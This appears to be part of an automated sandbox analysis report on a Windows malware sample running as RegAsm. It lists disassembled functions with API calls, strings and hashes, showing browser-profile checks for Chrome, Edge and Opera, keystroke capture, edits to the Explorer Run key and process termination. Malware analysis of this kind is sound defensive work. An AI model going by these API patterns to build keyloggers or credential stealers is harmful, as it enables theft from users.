                                                                • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocaleValid
                                                                • String ID: IsValidLocaleName$kKD
                                                                • API String ID: 1901932003-3269126172
                                                                • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                • API String ID: 1174141254-4188645398
                                                                • Opcode ID: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                                • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                • Opcode Fuzzy Hash: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                                • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                • API String ID: 1174141254-2800177040
                                                                • Opcode ID: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                                • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                • Opcode Fuzzy Hash: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                                • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                • API String ID: 1174141254-1629609700
                                                                • Opcode ID: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                                • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                • Opcode Fuzzy Hash: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                                • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyState.USER32(00000011), ref: 0040B686
                                                                  • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                                  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                • String ID: [AltL]$[AltR]
                                                                • API String ID: 2738857842-2658077756
                                                                • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: !D@$open
                                                                • API String ID: 587946157-1586967515
                                                                • Opcode ID: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                • Opcode Fuzzy Hash: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: State
                                                                • String ID: [CtrlL]$[CtrlR]
                                                                • API String ID: 1649606143-2446555240
                                                                • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Init_thread_footer__onexit
                                                                • String ID: ,kG$0kG
                                                                • API String ID: 1881088180-2015055088
                                                                • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A6C
                                                                • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteOpenValue
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                • API String ID: 2654517830-1051519024
                                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteDirectoryFileRemove
                                                                • String ID: pth_unenc
                                                                • API String ID: 3325800564-4028850238
                                                                • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                • String ID: pth_unenc
                                                                • API String ID: 1872346434-4028850238
                                                                • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                • GetLastError.KERNEL32 ref: 00440D85
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                • String ID:
                                                                • API String ID: 1717984340-0
                                                                • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastRead
                                                                • String ID:
                                                                • API String ID: 4100373531-0
                                                                • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99